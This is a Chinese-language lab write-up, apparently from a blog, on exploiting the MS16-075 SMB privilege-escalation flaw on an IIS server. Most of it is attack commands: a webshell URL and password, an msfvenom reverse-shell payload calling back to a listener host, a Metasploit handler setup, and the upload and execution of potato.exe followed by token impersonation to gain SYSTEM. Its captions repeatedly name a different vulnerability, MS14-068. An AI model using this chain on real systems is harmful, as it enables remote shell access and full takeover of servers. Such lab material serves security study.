MS14-068漏洞实验

MS16-075(CVE-2016-3225)漏洞实验

漏洞名称:

Windows SMB 服务器特权提升漏洞

补丁编号:

KB3164038

漏洞描述:

当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。

影响版本:

Windows Vista SP2

Windows Server 2008 SP2

Windows Server 2008 R2 SP1

Windows 7 SP1

Windows 8.1

Windows Server 2012 Gold

Windows Server 2012 R2

Windows RT 8.1

Windows 10 Gold, 1511,1607

漏洞利用:

需要在IIS环境下使用

通过web漏洞,获取一个webshell,前天条件需要webshell和执行权限。

http://192.168.231.129/aspnet_client/system_web/2_0_50727/about.aspx 密码:F4ck

《MS14-068漏洞实验》

进入webshell,查看当前用户为apppool\defaultapppool

iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

《MS14-068漏洞实验》

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.231.130 LPORT=5555 -f exe -o 5555.exe生成64位反弹shell。

《MS14-068漏洞实验》

利用webshell上传反弹shell 5555.exe

《MS14-068漏洞实验》

《MS14-068漏洞实验》

Msf设置监听

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 0.0.0.0

set LPORT 5555

run

《MS14-068漏洞实验》

利用webshell运行5555.exe

c:\windows\system32\cmd.exe

/c C:\inetpub\wwwroot\aspnet_client\system_web\2_0_50727\5555.exe

《MS14-068漏洞实验》

《MS14-068漏洞实验》

Msf获取meterpreter,查看当前用户为IIS APPPOOL\DefaultAppPool

《MS14-068漏洞实验》

《MS14-068漏洞实验》

msf下面执行upload命令上传

meterpreter > upload /tmp/potato.exe C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\2_0_50727\\potato.exe

《MS14-068漏洞实验》

《MS14-068漏洞实验》

使用ms16-075提权进行提权

use incognito

list_tokens -u //列出tokens

《MS14-068漏洞实验》

execute -cH -f C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\2_0_50727\\potato.exe //执行exp

《MS14-068漏洞实验》

《MS14-068漏洞实验》

list_tokens -u

《MS14-068漏洞实验》

impersonate_token “NT AUTHORITY\\SYSTEM” //提权

成功获取system权限

《MS14-068漏洞实验》

《MS14-068漏洞实验》

点赞

发表评论